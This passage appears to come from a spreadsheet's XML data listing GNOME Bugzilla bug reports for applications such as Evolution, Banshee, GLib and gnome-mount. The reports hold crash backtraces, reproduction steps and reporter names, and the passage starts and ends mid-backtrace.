    at wrapsyscall.c:172
#3  0x406bbbf6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x080926d1 in segv_redirect (sig=11) at main.c:67
#5  0x4020547b in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43
__dsh = 0 edi = 55573 esi = 136278352 ebp = 3221222856 esp =
3221222832 ebx = 1083724440 edx = 1084844620 ecx = 135124344 eax =
4475221 trapno = 14 err = 4 eip = 1083467664 cs = 35 __csh = 0 eflags
= 66054 esp_at_signal = 3221222832 ss = 43 __ssh = 0 fpstate =
0xbffff330 oldmask = 2147483648 cr2 = 4475221}) at signals.c:97
#6  0x40ac4128 in killpg () from /lib/libc.so.6
#7  0x4031d9c5 in update_timeout_callback (data=0x81f7150)
    at evolution-activity-client.c:188
#8  0x40a852c1 in g_timeout_dispatch (source_data=0x81f7098 
    dispatch_time=0xbffff690 user_data=0x81f7150) at gmain.c:1302
#9  0x40a84390 in g_main_dispatch (dispatch_time=0xbffff690) at gmain.c:656
#10 0x40a8496f in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#11 0x40a84b2b in g_main_run (loop=0x810e828) at gmain.c:935
#12 0x408e82b3 in gtk_main () at gtkmain.c:524
#13 0x405588eb in bonobo_main () at bonobo-main.c:283
#14 0x0809287c in main (argc=3 argv=0xbffff8bc) at main.c:140
#15 0x40ab31f0 in __libc_start_main () from /lib/libc.so.6
#0  0x40b4f689 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40bc06ec in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x40207aa6 in waitpid (pid=30270 stat_loc=0xbffff1ec options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff1ec
options = 0
result = 0
oldtype = 0
#3  0x406bbbf6 in gnome_segv_handle (signum=11) at gnome-init.c:659
659
		eret = waitpid(pid 
estatus = 136318104
in_segv.5 = 1
pid = 0
#4  0x080926d1 in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x4020547b in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43
__dsh = 0 edi = 55573 esi = 136278352 ebp = 3221222856 esp =
3221222832 ebx = 1083724440 edx = 1084844620 ecx = 135124344 eax =
4475221 trapno = 14 err = 4 eip = 1083467664 cs = 35 __csh = 0 eflags
= 66054 esp_at_signal = 3221222832 ss = 43 __ssh = 0 fpstate =
0xbffff330 oldmask = 2147483648 cr2 = 4475221}) at signals.c:97
	in signals.c
self = 0x4020e940
in_sighandler = 0x0
self = 0x4020e940
in_sighandler = 0x0
#6  0x40ac4128 in killpg () from /lib/libc.so.6
No symbol table info available.
#7  0x4031d9c5 in update_timeout_callback (data=0x81f7150)
    at evolution-activity-client.c:188
	in evolution-activity-client.c
data = (void *) 0x81f7150
activity_client = (EvolutionActivityClient *) 0x81f7150
priv = (EvolutionActivityClientPrivate *) 0xb</t>
  </si>
  <si>
    <t>dan.hensley</t>
  </si>
  <si>
    <t>GTKHTML-256824</t>
  </si>
  <si>
    <t>Cant Open Mail Editor</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
When trying to reply or write new mail I get:
evolution-1.5: relocation error:
/usr/lib/gtkhtml/libgnome-gtkhtml-editor-3.1.so: undefined symbol:
gtk_separator_tool_item_new
And Evolution dies silently</t>
  </si>
  <si>
    <t>GNOME-APPLETS-166370</t>
  </si>
  <si>
    <t>multiload</t>
  </si>
  <si>
    <t>MultiLoad applet crash at exit</t>
  </si>
  <si>
    <t>1. I run panel-test-applets
2. I add MultiLoadApplet
3. Applet works fine but when I close applet then it crash (The Application
multiload-applet-2 has quit unexpectedly.) and the Bug Buddy freeze.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-441042</t>
  </si>
  <si>
    <t>Debian patch to eggaccelerators.c</t>
  </si>
  <si>
    <t>The debian maintainer applied the change mentioned on bug #145271 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=254745</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-467586</t>
  </si>
  <si>
    <t>Folder rename hides folder hierarchy</t>
  </si>
  <si>
    <t>After renaming parent folderit hides folder hierarchy if folder has children
or sub folders.The problem is that it even doesn't display sub folders and
evolution requires restart to display sub folders.
If we don't restart evolutionit looks like that we have lost sub folders.
OpenSUSE 10.3 bug in BNC
https://bugzilla.novell.com/show_bug.cgi?id=295107</t>
  </si>
  <si>
    <t>abharath</t>
  </si>
  <si>
    <t>lakhil</t>
  </si>
  <si>
    <t>EVOLUTION-257608</t>
  </si>
  <si>
    <t>Too many autogenerated signatures proposal while composing mail</t>
  </si>
  <si>
    <t>While composing a mail if I click on Signature: None to choose a
signature for the current message the list that appears contains exactly
21 (twenty one) entries called Autogenerated. That's a bit too much I guess
Same thing happens for the signature button in the settings pane for each
of my mail accounts (IMAP and POP)</t>
  </si>
  <si>
    <t>joaquim</t>
  </si>
  <si>
    <t>GNOME-APPLETS-2893</t>
  </si>
  <si>
    <t>cpscan crashs gnome (tasklist_applet Crash at 38.254.214.185)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version: 1.0.52
Severity: 
&gt;Synopsis: cpscan crashs gnome
&gt;Class: sw-bug
System: 2.2.12debian E15.5
&gt;Description:
running cpscan againist gnome machine crashes gnome/but not other apps
&gt;How-To-Repeat:
cpscan
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:53 -------
This bug was previously known as bug 2893 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=2893
Originally filed under the gnome-applets product and general component.
The original reporter (amccool@cadscape.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>amccool</t>
  </si>
  <si>
    <t>EVOLUTION-220054</t>
  </si>
  <si>
    <t>Can't move messages to trash in incoming filters</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.2
Synopsis: Can't move messages to trash in incoming filters
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Hi!
I have some spam-filter rules in evo. Why can't I
move the affected messages into the Trash folder?
Trying to do so pops up a error message. I know what
I am doing I don't want some stupid application to
tell me what I need or need not do.
Regards
Tobias
Unknown reporter: tobias@berlin-consortium.org changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>BUG-BUDDY-84914</t>
  </si>
  <si>
    <t>shouldn't overwrite an existing file without prompt</t>
  </si>
  <si>
    <t>to reproduce:
1. use bug-buddy to report a bug go throught it unitl the mail
configuration stage
2. choose just save a file so I can submit a bug report manually 
3. Click forward. You are now in confirmation stage. If you have used
it before there will be a default file name in the Save in input box
which is the file name you used to save the last bug report.
4. just click save. Congratulations! You've overwritten an existing file
which may be another bug report that hasn't been send out:-( 
It happened to me. That's annoying.
Expected result:
It's convenient to have a default file name for your bug report but
please *ask for confirmation* before it actually overwrites an existing file.</t>
  </si>
  <si>
    <t>bug-buddy-maint</t>
  </si>
  <si>
    <t>quixon</t>
  </si>
  <si>
    <t>GTKMM-102885</t>
  </si>
  <si>
    <t>Bug in Glib::build_path</t>
  </si>
  <si>
    <t>Glibmm reimplements build_path instead of calling g_build_path and does it
incorrectly. Glib::build_path is unable to build global path (starting with
/ on Linux/Unix systems). g_build_path does it correctly.
This bug in build_path affects also this function:
nuild_filename(const ArrayHandle
because it calls build_path().
Function build_filename(const string is not
affected by this bug.
It is a great pity that I found this bug a day after Gtkmm 2.2 has been
released. I hope to see a fix quickly in 2.2.1 as my project depends on
this functionality and now I have to hack a fix for it.</t>
  </si>
  <si>
    <t>madmaxer</t>
  </si>
  <si>
    <t>ORCA-487585</t>
  </si>
  <si>
    <t>Orca Usage message should be localized.</t>
  </si>
  <si>
    <t>Need to check with the i18n/l10n folks but I'd guess that an
application usage message should be localized. (I certainly
do it for gcalctool).
From the usage() method in orca.py:
...
    print Usage: orca [OPTION...]
    print
    print -? --help                   Show this help message
    print -v --version                %s % platform.version
    print -s --setup --gui-setup     Set up user preferences
    print -t --text-setup             Set up user preferences (text version)
    print -n --no-setup               Skip set up of user preferences
    print -u --user-prefs-dir=dirname
    print  Use alternate directory for user preferences
    print -e --enable=[speech|braille|braille-monitor|magnifier|main-window]    print  Force use of option
    print -d --disable=[speech|braille|braille-monitor|magnifier|main-window] Prevent use of option
    print -q --quit                   Quits Orca (if shell script used)
    print
    print If Orca has not been previously set up by the user Orca
    print will automatically launch the preferences set up unless
    print the -n or --no-setup option is used.
    print
    print Report bugs to orca-list@gnome.org.
...</t>
  </si>
  <si>
    <t>NAUTILUS-40645</t>
  </si>
  <si>
    <t>nautilus_file_rename should handle path separators sensibly</t>
  </si>
  <si>
    <t xml:space="preserve">There's a FIXME in nautilus_file_rename that says Make sure this does something
sensible with incoming names containing path separators. Probably no one has
tested its current behavior.
------- Additional Comments From pavel@eazel.com 2000-05-01 15:05:46 ----
Gene do you want to deal with this? If not send it back my way.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:27:11 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:31:45 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Additional Comments From darin@bentspoon.com 2000-11-28 11:33:04 ----
I'm pretty sure that we end up moving files if a file name with path separators is 
passed in. Instead it would be better to report an error to the user.
------- Additional Comments From eli@eazel.com 2001-01-07 17:25:34 ----
Batch assigning my PR3 FIXMEs to Victor for verification.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:02 -------
</t>
  </si>
  <si>
    <t>DOXYGEN-509348</t>
  </si>
  <si>
    <t>A function description is distributed between the source and its header file</t>
  </si>
  <si>
    <t>C language project
A function call graph and references are put into the header file (where the function prototype with or without 'extern' keyword is located) while the caller graph and referenced by sections are put into the source file with the function definition.
I haven't found any properties to influence on this behavior and consider this as a bug. 
Moreover before the header file was created the function call graph was put into another source file where the function is used (called) but not defined.
It is possible to provide an example to reproduce the problem if necessary.</t>
  </si>
  <si>
    <t>sobolevsp</t>
  </si>
  <si>
    <t>GLIB-118730</t>
  </si>
  <si>
    <t>tests/utf8.txt thinks U+10FFFF is valid</t>
  </si>
  <si>
    <t>tests/utf8.txt still thinks U+10FFFF is a valid character. (see bug 107427)
Nobody noticed because of bug 118729 most likely.
 $ ./unicode-encoding
 line 94: valid but g_utf8_validate returned FALSE
 line 295: valid but g_utf8_validate returned FALSE
Not sure what would be best. I guess we could change them both to 10FFFD.</t>
  </si>
  <si>
    <t>EPIPHANY-134872</t>
  </si>
  <si>
    <t>Syntax error in epiphany.schemas</t>
  </si>
  <si>
    <t>The epiphany.schemas file has two misplaced entries that produce warnings 
while registering the schema into GConf2's database. 
The problem is in the /schemas/apps/epiphany/directories/downloads_folder 
schema the  and  tags which provide a description for it 
should appear inside the  item but they are placed outside.  
This is properly done in all other entries but this one seems just a 
typo. 
When the schema is registered the following error appears: 
WARNING: node  not understood below  
WARNING: node  not understood below  
WARNING: node  not understood below  
WARNING: node  not understood below  
Attached schema `/schemas/apps/epiphany/directories/downloads_folder' to 
key `/apps/epiphany/directories/downloads_folder' 
Installed schema `/schemas/apps/epiphany/directories/downloads_folder' 
for locale `C' 
The fix is trivial: just move the  and  tags inside .</t>
  </si>
  <si>
    <t>GNOME-PANEL-71279</t>
  </si>
  <si>
    <t>Tooltips don't stay up long enough</t>
  </si>
  <si>
    <t>If I put my mouse over a launcher in the gnome-panel it opens a tooltip. 
However the tooltip displays for about .5 seconds not nearly long enough
to read the entire message.  It should display until the mouse is dragged
off the launcher.</t>
  </si>
  <si>
    <t>EPIPHANY-112094</t>
  </si>
  <si>
    <t>[Tracking] Epiphany 0.7.0 must rule</t>
  </si>
  <si>
    <t>Let's roll.</t>
  </si>
  <si>
    <t>BANSHEE-350827</t>
  </si>
  <si>
    <t>Banshee crashes when Audioscrobbler produces error</t>
  </si>
  <si>
    <t>jeff@desktop:~$ gdb --eval-command=run --args mono --debug /usr/lib/banshee/banshee.exe
GNU gdb 6.4-debian
Copyright 2005 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i486-linux-gnu...(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
Starting program: /usr/bin/mono --debug /usr/lib/banshee/banshee.exe
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1212246336 (LWP 23228)]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
---Type  to continue or q  to quit---
(no debugging symbols found)
[New Thread -1216218192 (LWP 23238)]
[New Thread -1221403728 (LWP 23239)]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Type  to continue or q  to quit---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ï»¿Warning: [8/10/2006 5:45:24 PM] (Cannot connect to NetworkManager) - An available working network connection will be assumed
(no debugging symbols found)
[New Thread -1234736208 (LWP 23242)]
(no debugging symbols found)
(no debugging symbols found)
[New Thread -1236468816 (LWP 23246)]
[New Thread -1244861520 (LWP 23247)]
[Thread -1236468816 (LWP 23246) exited]
[Thread -1244861520 (LWP 23247) exited]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
---Type  to continue or q  to quit---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Type  to continue or q  to quit---
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Debug: [8/10/2006 5:45:34 PM] (Default player engine) - GStreamer 0.10
Debug: [8/10/2006 5:45:34 PM] (Audio CD Core Initialized) -
Audioscrobbler starting protocol engine
ï»¿: Could not grab key 174 (maybe another application has grabbed this key)
: Could not grab key 160 (maybe another application has grabbed this key)
: Could not grab key 176 (maybe another application has grabbed this key)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ew Thread -1277527120 (LWP 23249)]
(no debugging symbols found)
[Thread -1277527120 (zombie) exited]
(no debugging symbols found)
---Type  to continue or q  to quit---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ew Thread -1244861520 (LWP 23263)]
[Thread -1244861520 (LWP 23263) exited]
(no debugging symbols found)
[New Thread -1244861520 (LWP 23264)]
[Thread -1244861520 (LWP 23264) exited]
[New Thread -1244861520 (LWP 23265)]
[Thread -1244861520 (LWP 23265) exited]
(no debugging symbols found)
[New Thread -1244861520 (LWP 23266)]
[Thread -1244861520 (LWP 23266) exited]
[New Thread -1244861520 (LWP 23267)]
[New Thread -1236468816 (LWP 23268)]
[New Thread -1282638928 (LWP 23269)]
[New Thread -1291031632 (LWP 23270)]
[New Thread -1299424336 (LWP 23271)]
[New Thread -1307817040 (LWP 23272)]
[Thread -1299424336 (LWP 23271) exited]
[New Thread -1277527120 (LWP 23355)]
(no debugging symbols found)
[New Thread -1317180496 (LWP 23356)]
[New Thread -1318233168 (LWP 23357)]
---Type  to continue or q  to quit---
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1318233168 (LWP 23357)]
0xb17df707 in ?? ()
(gdb) mono_backtrace 15
#0 0xb17df707 in  Banshee.Plugins.Audioscrobbler.Engine:HandshakeGetResponse (System.IAsyncResult) + 0x387 (0xb17df380 0xb17df7f1) [0x21f00 - banshee.exe]
[Thread -1277527120 (zombie) exited]
#1  0x00000000 in ?? ()
Initial frame selected you cannot go up.
(gdb)</t>
  </si>
  <si>
    <t>janina.valentine</t>
  </si>
  <si>
    <t>CRIAWIPS-436223</t>
  </si>
  <si>
    <t>Canvas (libccc)</t>
  </si>
  <si>
    <t>CRIAWIPS</t>
  </si>
  <si>
    <t>CcBrush should be an interface</t>
  </si>
  <si>
    <t>1. Make CcBrush an interface
2. Implement the interface with CcGradient and CcColor (and get rid of the color brush)
3. Implement test sets that ensure proper redraws if the configuration of the brush changes</t>
  </si>
  <si>
    <t>criawips-maint</t>
  </si>
  <si>
    <t>BEAGLE-166775</t>
  </si>
  <si>
    <t>BEST doesn't high-light/show all search terms in a hit.</t>
  </si>
  <si>
    <t>Please describe the problem:
Using BEST try to search for texts like foo bar (without quotes) it shows
hit list.  However in the Snippet part of each hit only bar is highlighted.
Steps to reproduce:
1. Let beagled index the attached document.
2. From BEST give relativity einstein (as your search text without quotes)
Actual results:
BEST shows the document but only einstein got highlighted and displayed in
the snippet area and not relativity.
Expected results:
The snippet area should display a snippet containing all the search terms
(highlighted)
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>fredrik.hedberg</t>
  </si>
  <si>
    <t>EVOLUTION-308512</t>
  </si>
  <si>
    <t>Key /apps/evolution/lock/mail/accounts/save_password does not work correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
Even after I have set the value of the 
key /apps/evolution/lock/mail/accounts/save_password as true I am able to 
check/uncheck the 'Remember Password' checkbox in the Evolution Mail Account 
settings.
As I understand the 'Remember Password' checkbox should appear disabled in 
the UI when this key is set to a true value.
Steps to reproduce:
1. Set the value of the key /apps/evolution/lock/mail/accounts/save_password 
to true. 
2. Open Evolution Mail Client Settings.
3. Edit an existing mail account. 
Actual results:
In the 'Recieving Mail' and 'Sending Mail' tabs you would see that 
the 'Remember Password' checkbox is enabled.
Expected results:
The 'Remember Password' checkbox should be disabled.
Does this happen every time?
Yes
Other information:
The 'Remember Password' checkbox is enabled in the username/password window 
also.</t>
  </si>
  <si>
    <t>tjain</t>
  </si>
  <si>
    <t>GLIB-324571</t>
  </si>
  <si>
    <t>causes segfault in gftp ?</t>
  </si>
  <si>
    <t>gftp worked OK up until the current CVS HEAD version of glib.
all gnome from CVS HEAD as at 19th Dec 2005.
gftp 2.18
glib version 2.9.2
gdb stack trace :-
(gdb) run
Starting program: /usr/bin/gftp-gtk
[Thread debugging using libthread_db enabled]
[New Thread -1221372224 (LWP 28737)]
gFTP Warning: Skipping line 233 in config file: ssh2_sftp_path
gFTP Warning: Skipping line 239 in config file: ssh_use_askpass
gFTP Warning: Skipping line 243 in config file: sshv2_use_sftp_subsys
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1221372224 (LWP 28737)]
IA__g_slice_alloc (mem_size=Variable mem_size is not available.
) at gslice.c:388
388           (*magazine_chunks)-&gt;data = chunk-&gt;next
(gdb) thread apply all bt
Thread 1 (Thread -1221372224 (LWP 28737)):
#0  IA__g_slice_alloc (mem_size=Variable mem_size is not available.
) at gslice.c:388
#1  0xb7caf50c in real_insert_row (clist=Variable clist is not available.
) at gtkclist.c:6352
#2  0xb7ca6dc1 in gtk_clist_append (clist=Variable clist is not available.
) at gtkclist.c:2655
#3  0x0805bb2b in add_file_listbox (wdata=0x80877e0 fle=0x81ce060) at misc-gtk.c:717
#4  0x080553a1 in sortrows (clist=0x81da4a0 column=-1 data=0x80877e0) at gftp-gtk.c:1206
#5  0x0805ede5 in ftp_list_files (wdata=0x80877e0) at transfer.c:50
#6  0x08056356 in main (argc=1 argv=0xbfb5a964) at gftp-gtk.c:1327</t>
  </si>
  <si>
    <t>GOK-159163</t>
  </si>
  <si>
    <t>gok_spy_concatenate_child_names() should be called recursively until got a name</t>
  </si>
  <si>
    <t>I think gok_spy_concatenate_child_names() should be called
recursively until got a name. Some table cells are composite objects. In
some cases all of its children might don't have a name but some of its
grandchildren might have a name.</t>
  </si>
  <si>
    <t>haiplu+gnome</t>
  </si>
  <si>
    <t>GNUMERIC-152244</t>
  </si>
  <si>
    <t>corner does not follow pointeur position when resizing an object</t>
  </si>
  <si>
    <t>To reproduce the problem:
- open the .gnumeric file I will attach
- click on the right down corner of the chart
- drag it to the bottom slowly
=&gt; the corner does not follow the pointeur position
- move the pointeur up
=&gt; the window is reduced but the distance between the pointeur and the corner is
preserved.</t>
  </si>
  <si>
    <t>LIBSOUP-310826</t>
  </si>
  <si>
    <t>should be able to use getaddrinfo() if present</t>
  </si>
  <si>
    <t>Version details: libsoup-2.2.3
Distribution/Version: 3.7
Reproduce by running ./configure on OpenBSD-3.7.  
Configure complains that since it can't find gethostbyname_r() hostname lookups will  
not be threadsafe. However *BSD does have getaddrinfo()/getnameinfo() which is a 
thread-safe API.  
(Of course it may be implemented unsafely ... but so may gethostbyname_r() I  
suppose.)</t>
  </si>
  <si>
    <t>wiml</t>
  </si>
  <si>
    <t>EVOLUTION-583191</t>
  </si>
  <si>
    <t>Edit as new message not working</t>
  </si>
  <si>
    <t>Please describe the problem:
I noticed that Edit as new message is not properly working in folders other than sent folder. I have configured one gmail imap account. If I click any message in inbox and do right click-&gt;edit as new message most of the times mail body is blank. Attachments are added to cc &amp; subject is filled but body is blank.
Steps to reproduce:
1. Go to inbox.
2. Select any message.
3. right click and select edit as new message.
Actual results:
New message opened with to cc subject textboxes &amp; attachment bar filled but body blank.
Expected results:
It should have mail content as well.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>ruchir.brahmbhatt</t>
  </si>
  <si>
    <t>LIBGLADE-102570</t>
  </si>
  <si>
    <t>LIBGLADE</t>
  </si>
  <si>
    <t>Implement --with-html-dir in configure</t>
  </si>
  <si>
    <t>GNOME-PRINT-73793</t>
  </si>
  <si>
    <t>Files missing from libgnomeprintui POTFILES.in</t>
  </si>
  <si>
    <t>When I run intltool-update -M in the po directory I get:
---
The following files contain translations and are currently not in use.
Please consider adding these to the POTFILES.in file located in the po/
directory.
libgnomeprintui/gpaui/add-printer-dialog.c
libgnomeprintui/gpaui/config-dialog.c
libgnomeprintui/gpaui/media-orientation.c
tests/sample_code.c
tests/testembed.c
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
---</t>
  </si>
  <si>
    <t>RHYTHMBOX-104585</t>
  </si>
  <si>
    <t>Programmatic interfaces</t>
  </si>
  <si>
    <t>Segfault on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: rhythmbox
Severity: blocker
Version: 0.4.0
Synopsis: Segfault on startup
Bugzilla-Product: rhythmbox
Bugzilla-Component: CORBA interface
BugBuddy-GnomeVersion: 2.0 (2.1.2)
Description:
Description of Problem:
joel@milo:~$rhythmbox
INFO (31676: 0) Initializing GStreamer Core Library version 0.4.2
INFO (31676: 0) CPU features: (c1c7fbff) MMX 3DNOW MMXEXT
registry: loaded user_registry in 0.000389 seconds
          (/home/joel/.gstreamer/registry.xml)
registry: loaded global_registry in 0.266579 seconds
          (/opt/garnome/etc/gstreamer/registry.xml)
joel@milo:~$
Segfaults with the gnome-segfault window immediately after this
Steps to reproduce the problem:
1. See above
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Every time.
Additional Information:
Slack 8.1/9.0 GCC 3.2 tried with and without optimizations no
difference.
Garnome 0.19.0 TESTING installed to /opt/garnome note that
/home/joel/garnome is a symlink to /opt/garnome.
Debugging Information:
Backtrace was generated from '/home/joel/garnome/bin/rhythmbox'
0x402eb219 in wait4 () from /lib/libc.so.6
#0  0x402eb219 in wait4 () from /lib/libc.so.6
#1  0x4036b230 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4006b6c5 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:646
#3  0x40cd5ded in __pthread_sighandler () from /lib/libpthread.so.0
#4  
#5  0x402b734f in strlen () from /lib/libc.so.6
#6  0xbffff69c in ?? ()
#7  0x0805a79d in main (argc=1 argv=0xbffff714) at main.c:93
#8  0x40252b34 in __libc_start_main () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-28 00:01 -------
The original reporter (joelsmith17@attbi.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component rhythmbox-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>joelsmith17</t>
  </si>
  <si>
    <t>GNOME-MOUNT-453361</t>
  </si>
  <si>
    <t>programs</t>
  </si>
  <si>
    <t>GNOME-MOUNT</t>
  </si>
  <si>
    <t>gnome-mount crashed with SIGSEGV in g_datalist_id_set_data_full()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/gnome-mount/+bug/122673
Binary package hint: gnome-mount
Had just booted Gutsy (using VirtualBox 1.3.8).
...
Package: gnome-mount 0.6-1ubuntu2
...
#0  0xb79a3c2c in IA__g_datalist_id_set_data_full (datalist=0x8097060 key_id=50 data=0x0 destroy_func=0) at /build/buildd/glib2.0-2.13.5/glib/gdataset.c:216
	ddata = 
	__PRETTY_FUNCTION__ = IA__g_datalist_id_set_data_full
#1  0xb7a4d787 in g_object_real_dispose (object=0x8097058) at /build/buildd/glib2.0-2.13.5/gobject/gobject.c:533
No locals.
#2  0xb7c5c33d in gtk_object_dispose (gobject=0x8097058) at /build/buildd/gtk+2.0-2.11.4/gtk/gtkobject.c:423
No locals.
#3  0xb7d79611 in gtk_widget_dispose (object=0x8097058) at /build/buildd/gtk+2.0-2.11.4/gtk/gtkwidget.c:7439
	widget = (GtkWidget *) 0x8097058
#4  0xb7d87bfc in gtk_window_dispose (object=0x8097058) at /build/buildd/gtk+2.0-2.11.4/gtk/gtkwindow.c:1966
No locals.
#5  0xb7a4d9fb in IA__g_object_unref (_object=0x8097058) at /build/buildd/glib2.0-2.13.5/gobject/gobject.c:1765
	object = (GObject *) 0x8097058
	__PRETTY_FUNCTION__ = IA__g_object_unref
#6  0xb7d70ca5 in IA__gtk_widget_unref (widget=0x8097058) at /build/buildd/gtk+2.0-2.11.4/gtk/gtkwidget.c:7931
	__PRETTY_FUNCTION__ = IA__gtk_widget_unref
#7  0x0804f714 in volume_mount_with_options (udi=0x808a148 /org/freedesktop/Hal/devices/volume_part_1_size_1073741312 volume=0x808a760 drive=0x0 mount_point=0x8055981  
    fstype=0x8055981  options=0x8084080) at gnome-mount.c:862
	reply = (DBusMessage *) 0x0
	dmesg = (DBusMessage *) 0x807ed88
	ret = 0
	error = {name = 0x8088978 org.freedesktop.DBus.Error.UnknownMethod 
  message = 0x808ceb0 Method \Mount\ with signature \ssas\ on interface \org.freedesktop.Hal.Device.Volume\ doesn't exist\n dummy1 = 0 dummy2 = 1 dummy3 = 0 
  dummy4 = 0 dummy5 = 1 padding1 = 0x0}
	i = 
	device_file = 
	mounted_at = 
#8  0x080502e7 in volume_mount (udi=0x808a148 /org/freedesktop/Hal/devices/volume_part_1_size_1073741312 volume=0x808a760 drive=0x0) at gnome-mount.c:1564
	err = 
	serr = 
	exit_status = 
	sout = 
	args = {0xb7e957f0 S\004 0xb7eaf2b0  0x0}
	uidbuf = \202.Ã±Â·\230\bÃ²Â·\000\000\000\000\001\000\000\000\001\000\000\000\000\000\000\000\035\226\004\bÃ°\000\000\000\000\000\000\000 \225\005\bÃ°WÃ©Â·`Â§\b\b'Âº\b\b\234[\005\b\030ÃŽÃŽÂ¿Ã€\202Ã±Â·
	mount_point = 
	fstype_override = 0x0
	mount_options = (GPtrArray *) 0x8084080
	key = 0xc 
	ret = 
	fstype = 0x0
	device_file = 0x808bae8 /dev/scd0
	label = 
	uuid = 
	drive_udi = 
#9  0x080517fb in main (argc=) at gnome-mount.c:3131
	fsusage = 
	buf = 
	dev_null_fd = 
	drive = (LibHalDrive *) 0x0
	volume = (LibHalVolume *) 0x808a760
	udi = 0x808a148 /org/freedesktop/Hal/devices/volume_part_1_size_1073741312
	resolved_device_file = 
	error = (GError *) 0x0
	context = (GOptionContext *) 0x805a0e8
	i = 
	opt_connect_crypto = 0
	opt_disconnect_crypto = 0
	opt_verbose = 0
	opt_unmount = 0
	opt_eject = 0
	opt_hal_udi = (gchar *) 0x806ba88 /org/freedesktop/Hal/devices/volume_part_1_size_1073741312
	opt_device_file = (gchar *) 0x0
	opt_nickname = (gchar *) 0x0
	opt_mount_point = (gchar *) 0x0
	opt_mount_options = (gchar *) 0x0
	opt_extra_mount_options = (gchar *) 0x0
	opt_fstype = (gchar *) 0x0
	opt_write_settings = 0
	opt_display_settings = 0
	opt_erase_settings = 0
	entries = {{long_name = 0x8055bdd verbose short_name = 118 'v' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059874 description = 0x8055be5 Verbose operation 
    arg_description = 0x0} {long_name = 0x8055bf7 no-ui short_name = 110 'n' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059838 
    description = 0x8055bfd Don't show any dialogs arg_description = 0x0} {long_name = 0x8055c14 block short_name = 98 'b' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x8059834 description = 0x8057564 Allow gnome-mount to block for UI arg_description = 0x0} {long_name = 0x8055c1a unmount short_name = 117 'u' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0x8059870 description = 0x8055864 Unmount arg_description = 0x0} {long_name = 0x8055c39 connect-crypto short_name = 0 '\0' 
    flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x805987c description = 0x8055c22 Setup crypto device arg_description = 0x0} {long_name = 0x8055c36 disconnect-crypto 
    short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059878 description = 0x8055c48 Tear down crypto device arg_description = 0x0} {
    long_name = 0x8055b9b eject short_name = 101 'e' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x805986c description = 0x80557fa Eject arg_description = 0x0} {
